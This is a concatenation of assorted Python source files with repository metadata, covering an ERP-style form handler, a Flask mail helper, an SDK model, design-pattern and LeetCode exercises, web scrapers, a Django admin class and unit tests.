MVCExecAppend: mvcsession.entryDataset.Append() mvcsession.entryDataset.SetFieldValue('GLBCMINO', 0) mvcsession.entryDataset.SetFieldValue('GLBCMXNO', 999999) mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % 0) mvcsession.entryDataset.Post() if mvcsession.execType in (MVCExecShow, MVCExecEdit, MVCExecDelete, MVCExecCopy): q = GLBCNO.query q = q.filter_by(GLBCNOID = fields['GLBCNOID']) obj = q.first() if (mvcsession.execType == 
MVCExecCopy): mvcsession.entryDataset.CopyFromORM( 'GLBCNONM;GLBCMINO;GLBCMXNO', 'GLBCNONM;GLBCMINO;GLBCMXNO', obj) mvcsession.entryDataset.Edit() mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO) mvcsession.entryDataset.Post() else: mvcsession.entryDataset.CopyFromORM( 'GLBCNOID;GLBCNONM;GLBCMINO;GLBCMXNO', 'GLBCNOID;GLBCNONM;GLBCMINO;GLBCMXNO', obj) mvcsession.entryDataset.Edit() mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO) mvcsession.entryDataset.Post() if mvcsession.execType == MVCExecEdit: mvcsession.fieldDefs.GLBCNOID.enabled = False return mvcsession def postData(self, mvcsession): fields = mvcsession.entryDataset.FieldsAsDict() validators.NotEmpty(messages={'empty': 'Batch code must not empty'}).to_python(fields['GLBCNOID']) validators.NotEmpty(messages={'empty': 'Batch code name must not empty'}).to_python(fields['GLBCNONM']) if (fields['GLBCMINO'] is None) or (fields['GLBCMINO'] < 0): raise Exception('Minimum batch no must not empty or negative value, at least should be assign with 0') if (fields['GLBCMXNO'] is None) or (fields['GLBCMXNO'] > 999999): raise Exception('Minimum batch no must not empty or larger than 999999') q = GLBCNO.query q = q.filter_by(GLBCNOID = fields['GLBCNOID']) obj = q.first() td = dt.datetime.now() if (mvcsession.execType in (MVCExecAppend, MVCExecCopy)): if obj: raise Exception('Duplicate record found') rec = GLBCNO( GLBCNOID = fields['GLBCNOID'], GLBCNONM = fields['GLBCNONM'], GLBCMINO = fields['GLBCMINO'], GLBCMXNO = fields['GLBCMXNO'], GLBCLSNO = fields['GLBCMINO'], GLBCAUDT = td.date().tointeger(), GLBCAUTM = td.time().tointeger(), GLBCAUUS = mvcsession.cookies['user_name'].encode('utf8') ) if not session.transaction_started(): session.begin() try: session.save(rec) session.commit() except: session.rollback() session.expunge(rec) raise if (mvcsession.execType == MVCExecEdit): if not obj: raise Exception('Record could not be found') if fields['GLBCMINO'] > obj.GLBCLSNO: raise 
Exception('Starting Batch No must be smaller or equal with last batch no used') if fields['GLBCMXNO'] < obj.GLBCLSNO: raise Exception('Starting Batch No must be greater or equal with last batch no used') mvcsession.entryDataset.CopyIntoORM( 'GLBCNONM;GLBCMINO;GLBCMXNO', 'GLBCNONM;GLBCMINO;GLBCMXNO', obj) obj.GLBCAUDT = td.date().tointeger() obj.GLBCAUTM = td.time().tointeger() obj.GLBCAUUS = mvcsession.cookies['user_name'].encode('utf8') if not session.transaction_started(): session.begin() try: session.update(obj) session.commit() except: session.rollback() session.expunge(obj) raise if (mvcsession.execType == MVCExecDelete): if not obj: raise Exception('Record could not be found') if not session.transaction_started(): session.begin() try: session.delete(obj) session.commit() except: session.rollback() raise return mvcsession
[ "jaimy@usg.co.id" ]
jaimy@usg.co.id
b032448cdd45f3bca30ed5edd475db6b2a16818f
0b3ada069436097d3ed5694d069094975983e692
/app/email.py
8dba3196785683a634748d35efd3f17d5571fc83
[ "MIT" ]
permissive
AugustineOchieng/blogger
3329d866ccb25916c814607354ee12b6ca02a192
d8205ddb6cd17c654003b49ff876002fb65b3449
refs/heads/master
2020-05-17T19:24:48.248542
2019-05-01T11:21:50
2019-05-01T11:21:50
183,913,837
0
0
null
null
null
null
UTF-8
Python
false
false
428
py
from flask_mail import Message
from flask import render_template
from . import mail


def mail_message(subject, template, to, **kwargs):
    """Render *template* (.txt and .html variants) and e-mail it to *to*.

    Args:
        subject: subject line for the message.
        template: template path without extension; "<template>.txt" and
            "<template>.html" are rendered with **kwargs as context.
        to: single recipient address.
    """
    # Fix: removed the unused local `subject_pref` ("Bloggeropolis!").
    # NOTE(review): it may have been intended as a subject prefix -- confirm
    # with the author before resurrecting it.
    sender_email = "gustin9tis@gmail.com"
    email = Message(subject, sender=sender_email, recipients=[to])
    email.body = render_template(template + ".txt", **kwargs)
    email.html = render_template(template + ".html", **kwargs)
    mail.send(email)
[ "gusochieng@gmail.com" ]
gusochieng@gmail.com
780f2cd79121de44c0705d7240a4bfc0a6922918
a2d36e471988e0fae32e9a9d559204ebb065ab7f
/huaweicloud-sdk-apig/huaweicloudsdkapig/v2/model/check_app_v2_response.py
1ff24a04b5f76cf87a8d8039729f21a18cfd6ffe
[ "Apache-2.0" ]
permissive
zhouxy666/huaweicloud-sdk-python-v3
4d878a90b8e003875fc803a61414788e5e4c2c34
cc6f10a53205be4cb111d3ecfef8135ea804fa15
refs/heads/master
2023-09-02T07:41:12.605394
2021-11-12T03:20:11
2021-11-12T03:20:11
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,181
py
# coding: utf-8
# Auto-generated Huawei Cloud SDK response model; edit the generator, not
# this file, for structural changes.

import re
import six

from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization


class CheckAppV2Response(SdkResponse):
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """

    sensitive_list = []

    openapi_types = {
        'name': 'str',
        'remark': 'str',
        'id': 'str'
    }

    attribute_map = {
        'name': 'name',
        'remark': 'remark',
        'id': 'id'
    }

    def __init__(self, name=None, remark=None, id=None):
        """CheckAppV2Response - a model defined in huaweicloud sdk"""
        super(CheckAppV2Response, self).__init__()

        self._name = None
        self._remark = None
        self._id = None
        self.discriminator = None

        if name is not None:
            self.name = name
        if remark is not None:
            self.remark = remark
        if id is not None:
            self.id = id

    @property
    def name(self):
        """Gets the name of this CheckAppV2Response.

        Name (translated from: 名称)

        :return: The name of this CheckAppV2Response.
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this CheckAppV2Response.

        Name (translated from: 名称)

        :param name: The name of this CheckAppV2Response.
        :type: str
        """
        self._name = name

    @property
    def remark(self):
        """Gets the remark of this CheckAppV2Response.

        Description (translated from: 描述)

        :return: The remark of this CheckAppV2Response.
        :rtype: str
        """
        return self._remark

    @remark.setter
    def remark(self, remark):
        """Sets the remark of this CheckAppV2Response.

        Description (translated from: 描述)

        :param remark: The remark of this CheckAppV2Response.
        :type: str
        """
        self._remark = remark

    @property
    def id(self):
        """Gets the id of this CheckAppV2Response.

        Identifier (translated from: 编号)

        :return: The id of this CheckAppV2Response.
        :rtype: str
        """
        return self._id

    @id.setter
    def id(self, id):
        """Sets the id of this CheckAppV2Response.

        Identifier (translated from: 编号)

        :param id: The id of this CheckAppV2Response.
        :type: str
        """
        self._id = id

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                # Sensitive attributes are masked in the exported dict.
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, CheckAppV2Response):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
[ "hwcloudsdk@huawei.com" ]
hwcloudsdk@huawei.com
606917a953a5ba9bd05e5c654c44e55c2a271996
39fe41a33c00ea6dc8e04c61842c3764fdd07ff1
/DesignPatterns/facade.py
68b49f8243be5c700fa4b1cd862d024366b7471a
[]
no_license
playbar/pylearn
f9639ffa1848a9db2aba52977de6c7167828b317
8bcd1b5a043cb19cde1631947eb128d9c05c259d
refs/heads/master
2021-06-12T01:51:33.480049
2021-03-31T12:16:14
2021-03-31T12:16:14
147,980,595
1
0
null
null
null
null
UTF-8
Python
false
false
824
py
#!/usr/bin/env python
# encoding: utf-8

"""
Facade pattern (translated from the original Chinese docstring).

Provide a single, consistent interface to a set of subsystem interfaces.
Defining this higher-level interface makes the subsystem easier to use:
- one point of contact
- fewer dependencies for callers
"""


class SystemA(object):
    def call_a(self):
        # Fix: Python-2 `print` statements made this file a SyntaxError on
        # Python 3; the function form behaves identically on both.
        print("call a")


class SystemB(object):
    def call_b(self):
        print("call b")


class SystemC(object):
    def call_c(self):
        print("call c")


class Facade(object):
    """Single entry point that orchestrates the three subsystems."""

    def __init__(self):
        self.sys_a = SystemA()
        self.sys_b = SystemB()
        self.sys_c = SystemC()

    def action_a(self):
        self.sys_a.call_a()
        self.sys_b.call_b()

    def action_b(self):
        self.sys_b.call_b()
        self.sys_c.call_c()


if __name__ == '__main__':
    facade = Facade()
    facade.action_a()
[ "hgl868@126.com" ]
hgl868@126.com
9ceb1b638334a728375e941ce1e636ec41bd9100
353def93fa77384ee3a5e3de98cfed318c480634
/.history/week01/homework01/gettop10frommaoyam01_20200626151530.py
77640fcb8bd12bc2890a662ba05e9850d148ab86
[]
no_license
ydbB/Python001-class01
d680abc3ea1ccaeb610751e3488421417d381156
ad80037ccfc68d39125fa94d2747ab7394ac1be8
refs/heads/master
2022-11-25T11:27:45.077139
2020-07-19T12:35:12
2020-07-19T12:35:12
272,783,233
0
0
null
2020-06-16T18:28:15
2020-06-16T18:28:15
null
UTF-8
Python
false
false
3,018
py
# (translated) Use requests and bs4 to scrape the name, genre and release
# date of the Maoyan top-10 movies and save them to a UTF-8 CSV file.
# NOTE(review): this is an in-progress history snapshot -- get_urls currently
# only prints the <dd> tags it finds and returns an empty set, so main()
# prints set() and the commented-out pipeline below never runs.
import requests
from bs4 import BeautifulSoup as bs
import re
import pandas as pd

maoyanUrl = "https://maoyan.com/board/4";
# Request headers copied from a real browser session (cookie included) so
# Maoyan serves the page instead of a verification wall.
header = {
    'Content-Type': 'text/plain; charset=UTF-8',
    'Cookie' : '__mta=251934006.1593072991075.1593140975947.1593145816387.21; uuid_n_v=v1; uuid=2395D3F0B6BC11EA9F28E30FF5FFF73C9A16AE2FA53A448DA75AEAA9D715CB59; _csrf=8557626db9b655cf9050ae7e5b2aab69278c8061c21eca95e1c3cf2130b0b64c; _lxsdk_cuid=172ea8cb247c8-0a73066b1c0a8b-4353760-100200-172ea8cb248c8; _lxsdk=2395D3F0B6BC11EA9F28E30FF5FFF73C9A16AE2FA53A448DA75AEAA9D715CB59; mojo-uuid=c457eacb7c1eb59d3d2f6c1f8d75b9c9; Hm_lvt_703e94591e87be68cc8da0da7cbd0be2=1593072989,1593073002; _lx_utm=utm_source%3Dgoogle%26utm_medium%3Dorganic; __mta=251934006.1593072991075.1593140975947.1593145813576.21; Hm_lpvt_703e94591e87be68cc8da0da7cbd0be2=1593145819; _lxsdk_s=172ef3adc93-67a-f25-f7b%7C%7C1',
    # 'Host' : 'http://www.baidu.com',
    'Origin': 'https://maoyan.com',
    'Referer': 'https://maoyan.com/board/4',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
}

def get_urls(url, headers):
    # Collect detail-page URLs for the top-10 films (work in progress).
    main_url = 'https://maoyan.com'
    response = requests.get(url,headers=header)
    bs_info = bs(response.text,"html.parser")
    films_url = []
    for tag in bs_info.find_all('div',attrs={'class':''}):
        # for tag_p in tag.find_all('a',href=re.compile('/films/')) :  # (translated) collect detail-page links
        #     films_url.append(main_url + tag_p.get('href'))
        for ts in tag.find_all('dd',):
            print(ts)
    urls = set(films_url)
    return urls

# NOTE(review): redundant mid-file import -- pandas is already imported as
# `pd` at the top; kept as-is in this documentation-only pass.
import pandas

# (translated) Fetch the detail pages.
def get_page_info(urls,header):
    films_content = []
    for url in urls:
        content = get_page_brief(url,header)
        #print(content)
        films_content.append(content)
    return films_content

# (translated) Scrape one film's detail information.
def get_page_brief(url,header):
    response = requests.get(url, headers=header)
    bs_info = bs(response.text,'html.parser')
    atag = bs_info.find('div',attrs={'class':'banner'})
    # Chinese title plus the English ("ename") title, space separated.
    film_name = atag.find('h1').text +" "+ atag.find('div',attrs = {'class' : 'ename ellipsis'}).text
    film_type = ""
    for type in atag.find_all('a',attrs={'target':'_blank'}):
        film_type = film_type + type.text
    tags = atag.find_all('li')
    # The last <li> in the banner holds the release date.
    online_time = tags[-1].text
    brief = [film_name,film_type,online_time]
    return brief

# (translated) Save the movie information to CSV.
def save_movies(movies):
    print(movies)
    top10 = pd.DataFrame(data=movies)
    top10.to_csv('./week01/homework01/top10.csv',encoding='utf-8',index=False,header=False)
    print('finish')

def main():
    urls = get_urls(maoyanUrl,header)
    print(urls)
    # movies = get_page_info(urls,header)
    # save_movies(movies)

if __name__ == '__main__':
    main()
[ "31039587+ydbB@users.noreply.github.com" ]
31039587+ydbB@users.noreply.github.com
a52e7b37c644fdf27dd6a147fb363750beeb1170
5be8b0f2ee392abeee6970e7a6364ac9a5b8ceaa
/xiaojian/xiaojian/forth_phase/spider/day06/10_element_elements.py
543da3b7503da3b4d136930167ade6a5d0bf9d12
[]
no_license
Wellsjian/20180826
424b65f828f0174e4d568131da01dafc2a36050a
0156ad4db891a2c4b06711748d2624080578620c
refs/heads/master
2021-06-18T12:16:08.466177
2019-09-01T10:06:44
2019-09-01T10:06:44
204,462,572
0
1
null
2021-04-20T18:26:03
2019-08-26T11:38:09
JavaScript
UTF-8
Python
false
false
359
py
from selenium import webdriver browser = webdriver.Chrome() browser.get('https://www.qiushibaike.com/text/') div = browser.find_element_by_class_name('content') print(div.text) divs = browser.find_elements_by_class_name('content') for div in divs: print('\033[36m------------------------\033[0m') print("*"*60) print(div.text) print('*'*60)
[ "1149158963@qq.com" ]
1149158963@qq.com
7eeebdbd1ca8d9eb2c0e18ced034e18ec6d015fc
3859ee7a1694f30c69e4cb4ee392f3e197b23aaa
/setup.py
47709527027d8e6f99ae7e17716a84e46f4be6f2
[]
no_license
ibell/achp
71467905986ae5f0c7dcab0b2ca98bfd0aa30977
1003d16c651447d0068173e6d3186ebae9672bb1
refs/heads/master
2016-08-02T21:40:56.971781
2013-10-26T23:33:45
2013-10-26T23:33:45
12,282,085
8
1
null
null
null
null
UTF-8
Python
false
false
1,475
py
from distutils.core import setup, Extension import subprocess,shutil,os,sys # Obtain the numpy include directory. This logic works across numpy versions. ## import numpy ## try: ## numpy_include = numpy.get_include() ## except AttributeError: ## numpy_include = numpy.get_numpy_include() sys.argv += ['install','--reswig'] if '--reswig' in sys.argv: import subprocess subprocess.check_output(['swig','-python','-c++','-I../externals/coolprop','-I../externals/thermalcorr','ACHP.i'],cwd = 'src') sys.argv.remove('--reswig') numpy_include=[''] commons = dict(include_dirs = ['externals'], libraries = ['CoolPropLib_MD','ThermalCorr_MD'], library_dirs = ['externals/coolprop/wrappers/StaticLibrary/VS2008','externals/thermalcorr/wrappers/StaticLibrary/VS2008'], ) ACHP_module = Extension('ACHP._ACHP', sources=['src/ACHP_wrap.cxx', 'src/Compressor.cpp', 'src/BPHE.cpp'], **commons ) setup (name = 'ACHP', version = '0.0.1dev', package_dir = {'ACHP':'src'}, packages = ['ACHP'], author = "Ian Bell", author_email='ian.h.bell@gmail.com', url='http://achp.sourceforge.net', description = """ Steady-state system model using moving boundary models """, ext_modules = [ACHP_module], )
[ "ian.h.bell@gmail.com" ]
ian.h.bell@gmail.com
f0f4fb7a984294ff86a025ef21742ce630c55ed9
28a462a28f443c285ca5efec181ebe36b147c167
/tests/compile/basic/es2020/Assertion[3,0].Evaluation.spec
ad2d76f4da932e0db88fb74aa47a081acc9841be
[ "BSD-3-Clause", "BSD-2-Clause" ]
permissive
kaist-plrg/jstar
63e71f9156860dc21cccc33a9f6c638dfee448ea
1282919127ea18a7e40c7a55e63a1ddaaf7d9db4
refs/heads/main
2022-07-22T08:12:34.947712
2022-02-27T04:19:33
2022-02-27T11:06:14
384,045,526
6
4
NOASSERTION
2022-02-27T11:05:26
2021-07-08T07:53:21
Python
UTF-8
Python
false
false
587
spec
1. Return a new Matcher with parameters (_x_, _c_) that captures nothing and performs the following steps when called: 1. Assert: _x_ is a State. 1. Assert: _c_ is a Continuation. 1. Let _e_ be _x_'s _endIndex_. 1. Call IsWordChar(_e_ - 1) and let _a_ be the Boolean result. 1. Call IsWordChar(_e_) and let _b_ be the Boolean result. 1. If _a_ is *true* and _b_ is *true*, or if _a_ is *false* and _b_ is *false*, then 1. Call _c_(_x_) and return its result. 1. Return ~failure~.
[ "h2oche22@gmail.com" ]
h2oche22@gmail.com
78359dbbfdcc0879f9aa11bc2d8d6be24d39d081
1f74112d7e90c278c66c085db9ef44abcea0cf39
/tests.py
98be0ee734d9238cd077be193edb45cc654c4c3e
[]
no_license
mmahnken/pronounce_gaelic
22c0a6b4cf97204ef0cfbfd0c22bca9968d59613
23ef9c4ab1e44e8e06fcb5582260a7d9b0f5203d
refs/heads/master
2016-09-10T12:57:28.199943
2015-05-25T17:18:43
2015-05-25T17:18:43
29,276,608
3
0
null
null
null
null
UTF-8
Python
false
false
2,355
py
import random import unittest import compare as c import os TRAINING_DIR = 'gaelic_audio' USER_AUDIO = 'window_meggie.wav' USER_REF_AUDIO = 'gaelic_audio/window.mp3' class TestMatchingAlgorithm(unittest.TestCase): def setUp(self): print "setting up audio match test" self.comparator = c.train(TRAINING_DIR) self.training_dir = TRAINING_DIR training_files = [os.path.join(TRAINING_DIR, f) for f in os.listdir(TRAINING_DIR)] self.random_ref_file = random.choice(training_files) self.user_audio = USER_AUDIO self.user_ref_audio = USER_REF_AUDIO def test_self_equality(self): """Given reference audio x, test whether querying x returns x in the top 3 matching results.""" results = c.compare(self.random_ref_file, self.random_ref_file, self.comparator) self.assertTrue(self.random_ref_file in results[0:3]) def test_strict_self_equality(self): """Given reference audio x, test whether querying x returns x as the highest matching result.""" results = c.compare(self.random_ref_file, self.random_ref_file, self.comparator) self.assertTrue(self.random_ref_file == results[0]) def test_audio_search(self): """Given user generated audio x, test whether the the corresponding reference file y for the same word is in the top 3 matching results.""" results = c.compare(self.user_ref_audio, self.user_audio, self.comparator) self.assertTrue(self.random_ref_file == results[0:3]) class TestPointsOfOnset(unittest.TestCase): def setUp(self): training_files = [os.path.join(TRAINING_DIR, f) for f in os.listdir(TRAINING_DIR)] self.ref_file_1 = random.choice(training_files) while self.ref_file_1 == ref_file_2: ref_file_2 = random.choice(training_files) self.ref_file_2 = ref_file_2 def test_different_points_of_onset(self): pass # get 2 random audio files # find points of onset for each # make sure the two are not equal def test_similar_points_of_onset(self): pass # get a reference and homemade audio file for same signal # find points of onset for each # make sure the two are relatively similar if __name__ 
== "__main__": unittest.main()
[ "mmm25eg@gmail.com" ]
mmm25eg@gmail.com
b7a63d862fb96580c9845b39a7cf5f65eefcfe72
4351a81d4a4fae778711643cb9644534e595920d
/Python 3/LeetCode/lc107.py
9a8872ffa11f932a887dc4e49d3d1c1784327c59
[]
no_license
nsmith0310/Programming-Challenges
ba1281127d6fa295310347a9110a0f8998cd89ce
7aabed082826f8df555bf6e97046ee077becf759
refs/heads/main
2023-08-13T14:47:10.490254
2021-10-13T04:35:57
2021-10-13T04:35:57
416,565,430
0
0
null
null
null
null
UTF-8
Python
false
false
1,479
py
# Definition for a binary tree node. # class TreeNode: # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution: def levelOrderBottom(self, root: TreeNode) -> List[List[int]]: if root==None:return root tmp = [[root,1,0,-1]] count = 0 o = [root.val] for x in tmp: count+=1 if x[0].right!=None: tmp.append([x[0].right,x[1]+1,1,count]) o.append(x[0].right.val) if x[0].left!=None: tmp.append([x[0].left,x[1]+1,0,count]) o.append(x[0].left.val) tmp.sort(key = lambda x: x[1]) l = [[] for j in range(0,tmp[-1][1])] i = 0 while i<len(tmp): l[tmp[i][1]-1].append([tmp[i][0].val,tmp[i][2],tmp[i][3]]) i+=1 l = l[::-1] ###print(l) f = [[] for x in l] i = 0 while i<len(l): tmp = l[i] left = [] for x in tmp: left.append([x[0],x[2]]) left.sort(key=lambda x: x[1]) left = left[::-1] for y in left: f[i].append(y[0]) i+=1 return f
[ "92414264+nsmith0310@users.noreply.github.com" ]
92414264+nsmith0310@users.noreply.github.com
d2e0aba87f3f9b8864b351aa8b50b156159ae731
667f896c43a92d58a00d8a0899a68afdf7bdf2d6
/comments/admin.py
b8c35fd1f61901d7b0c59fdb8dee3a6e320c1778
[]
no_license
blazer-05/myshop3
bfa9ac1072122bbecea3bbfac6ee59c44d1d3ac6
8a91f04fc3dfa6a0d07934c5f8a6e87c39b3da61
refs/heads/master
2022-11-25T01:31:16.613811
2020-05-06T07:37:30
2020-05-06T07:37:30
141,247,818
2
2
null
2022-11-22T03:22:57
2018-07-17T07:18:38
HTML
UTF-8
Python
false
false
2,734
py
from django.contrib import admin from django.utils.safestring import mark_safe from django_summernote.admin import SummernoteModelAdmin from comments.models import Comment # Функции фильтрации для массовой публикации/снятия с публикации новостей. def all_post(modeladmin, request, queryset): for qs in queryset: print(qs.title) def complete_post(modeladmin, request, queryset): queryset.update(is_active=True) complete_post.short_description = 'Опубликовать новость' def incomplete_post(modeladmin, request, queryset): queryset.update(is_active=False) incomplete_post.short_description = 'Снять с публикации новость' # Конец Функции фильтрации @admin.register(Comment) class CommentAdmin(SummernoteModelAdmin): list_display = ['id', 'content_object', 'sender', 'is_authenticated', 'text_format', 'email', 'like', 'dislike', 'is_active', 'created', 'updated'] list_editable = ['is_active', ] list_display_links = ['content_object'] # Выводит в админке какие поля будут в виде ссылок. list_per_page = 10 # Вывод количества комментариев в админке actions = [complete_post, incomplete_post] # Методы complete_post, incomplete_post для массового снятия/публикации товаров. def sender(self, obj): '''Метод определяет в одном столбце кто добавил комментарий user или user_name (т.е. зарегистрированный или нет пользовватель)''' return obj.user or obj.user_name sender.short_description = 'Отправитель' def is_authenticated(self, obj): '''Метод определяет в одном столбце от кого был комментарий от авторизаванного или анонимного пользователя''' return bool(obj.user) is_authenticated.short_description = 'Зарегистрирован' is_authenticated.boolean = True def text_format(self, obj): '''Метод, который убирает в админке в поле text теги <p><br></p> от визуального редактора Summernote. 
В настройках суммернота не получилось это сделать.''' return mark_safe(obj.text) text_format.short_description = 'Комментарии' def content_object(self, content_object): return content_object content_object.short_description = 'Новость'
[ "blazer-05@mail.ru" ]
blazer-05@mail.ru
765c3cd1cbf0657bb02da732081d4795110463e2
b2a45f26d41930e4e9d304bcff74221029fe48c1
/target_offer/34_丑数.py
e4dfbfd82c4745033f0337cf8ec1e9655ff947b1
[]
no_license
Hk4Fun/algorithm_offer
29db9a9565f6e7400539f8c3b85cceb524918964
b1764cd62e1c8cb062869992d9eaa8b2d2fdf9c2
refs/heads/master
2021-07-01T04:22:58.168117
2019-04-02T12:26:32
2019-04-02T12:26:32
115,990,532
1
0
null
null
null
null
UTF-8
Python
false
false
6,653
py
__author__ = 'Hk4Fun' __date__ = '2018/2/10 21:06' '''题目描述: 把只包含质因子2、3和5的数称作丑数(Ugly Number)。例如6、8都是丑数,但14不是,因为它包含质因子7。 习惯上我们把1当做是第一个丑数。求按从小到大的顺序的第N个丑数。 ''' '''主要思路: 思路1:逐个判断每个数是否为丑数,直观但不够高效。 如果一个数能被2整除,就把它连续除以2; 如果能被3整除,就把它连续除以3; 如果能被5整除,就把它连续除以5。 如果最后我们得到的是1,那么这个数就是丑数。 该算法最大的问题就是每个整数都要计算, 即使一个数字不是丑数我们还是要对它进行求余和除法操作。 思路2:创建数组保存已经找到的丑数并排好序,关键在于如何生成下一个丑数 数组中最后一个丑数最大,记为M。设置index2,标记该位置的数乘以2大于M, 同理设置index3、index5,这样每次只需求min(A[index2]*2,A[index3]*3,A[index5]*5) 就可求出下一个丑数,然后更新三个标记。这样关键就在于如何更新这三个标记, 对于index2,只需往后遍历,直到指向的那个数乘2大于M即可停止,其他两个同理。 空间换时间,比思路1时间上快了不少 思路3:对思路2的改进,对于如何更新那三个标记,仔细推敲可以发现其实 只需让那些指向的数乘相应因子等于当前M的标记往后移一位即可, 因为 M = min(A[index2]*2,A[index3]*3,A[index5]*5),则至少有个标记是要往后移的, 且移一位即可,后面那个数乘以相应的因子一定大于M。 那么其他指向的数乘相应因子不等于当前M的标记为什么没有必要移动呢? 还是因为 M = min(A[index2]*2,A[index3]*3,A[index5]*5), 既然M是其中最小的, 那么其他的标记所指向的数乘以相应因子一定就比M大了,没有必要更新 这样就可以把思路2中的三个并列的while简化成三个并列的if 更新:这里谈谈为什么要使用这三个index,且为什么这样做可以保证按顺序产生下一个丑数。 按照正常的理解,后面的丑数都是由前面已经产生的某个丑数乘2或乘3或乘5得到,为了按照顺序, 必须把前面每个丑数乘2或乘3或乘5得到的值中取大于当前最后一个丑数的最小值。 那么问题来了,有必要把每个丑数都乘这三个因子然后取最小值? 
我们发现每个丑数都要经历乘2乘3乘5的过程,但却没有必要在同一次竞争下一个丑数中乘, 所以我们反过来,标记上那些需要乘2或乘3或乘5的数,使得index2指向的数就要乘2, 因为它在下一次竞争中可能会胜利,index3和index5同理。为了满足以上规则, 我们让这三个标记从左向右各自独立遍历,这样也就让每个数都会经历乘2或乘3或乘5的过程, 且如果标记的数乘以相应因子后竞争胜利了,那么该标记就要往后挪1位, 因为新的丑数是该标记因子乘以它指向的数竞争胜利而生成的, 所以该数乘以该因子已经没有参与下一次竞争的机会了,相应的因子标记就该往后挪, 使得下一个数参与新的竞争。而其他竞争失败的标记不用动,因为它们还有竞争胜利的机会, 毕竟每次胜利的是那个乘积最小的。 ''' class Solution: def GetUglyNumber1(self, index): def isUgly(number): while number % 2 == 0: number //= 2 while number % 3 == 0: number //= 3 while number % 5 == 0: number //= 5 return number == 1 if not index or index <= 0: return 0 number = uglyFound = 0 while uglyFound < index: number += 1 if isUgly(number): uglyFound += 1 return number def GetUglyNumber2(self, index): if not index or index <= 0: return 0 uglyNumbers = [1] index2 = index3 = index5 = 0 for i in range(1, index): # 竞争产生下一个丑数 uglyNumbers.append(min(uglyNumbers[index2] * 2, uglyNumbers[index3] * 3, uglyNumbers[index5] * 5)) while uglyNumbers[index2] * 2 <= uglyNumbers[-1]: index2 += 1 while uglyNumbers[index3] * 3 <= uglyNumbers[-1]: index3 += 1 while uglyNumbers[index5] * 5 <= uglyNumbers[-1]: index5 += 1 return uglyNumbers[-1] def GetUglyNumber3(self, index): if not index or index <= 0: return 0 if index < 7: # 小于7的丑数连续 return index uglyNumbers = [1] index2 = index3 = index5 = 0 for _ in range(index - 1): # 竞争产生下一个丑数 uglyNumbers.append(min(uglyNumbers[index2] * 2, uglyNumbers[index3] * 3, uglyNumbers[index5] * 5)) # 把思路2中的三个并列的while简化成三个并列的if # 可能会有多个标记竞争胜利,即丑数恰好是前面标记所在值的公倍数 # 因此必须是并列的if,不能if...elif...else if uglyNumbers[-1] == uglyNumbers[index2] * 2: index2 += 1 if uglyNumbers[-1] == uglyNumbers[index3] * 3: index3 += 1 if uglyNumbers[-1] == uglyNumbers[index5] * 5: index5 += 1 return uglyNumbers[-1] # ================================测试代码================================ from Test import Test class MyTest(Test): def my_test_code(self): # 只需在此处填写自己的测试代码 # testArgs中每一项是一次测试,每一项由两部分构成 # 第一部分为被测试函数的参数,第二部分只有最后一个,为正确答案 self.debug = True testArgs = [] testArgs.append([1, 
1]) testArgs.append([2, 2]) testArgs.append([3, 3]) testArgs.append([4, 4]) testArgs.append([5, 5]) testArgs.append([6, 6]) testArgs.append([7, 8]) testArgs.append([8, 9]) testArgs.append([9, 10]) testArgs.append([10, 12]) testArgs.append([11, 15]) # testArgs.append([1500, 859963392]) testArgs.append([0, 0]) return testArgs def convert(self, result, *func_arg): return result if __name__ == '__main__': solution = Solution() MyTest(solution=solution).start_test()
[ "941222165chenhongwen@gmail.com" ]
941222165chenhongwen@gmail.com
2952d3163c6deb0bb67610b3eb1032741fce506b
6dd400fec6f302bd0dcf309e2deec5de906d205c
/anal_pro4/deep_learn3/tf_classifi7_ex.py
c0b46953504a7cddfb096583808dd5790dc9ab65
[]
no_license
Leo-hw/psou
aa938b7cfaa373a0980649125270c48d816202b0
70379156a623257d412bcccbac72986a61226bd4
refs/heads/master
2023-02-21T19:00:02.902510
2021-01-25T07:03:26
2021-01-25T07:03:26
332,616,685
1
0
null
null
null
null
UTF-8
Python
false
false
2,875
py
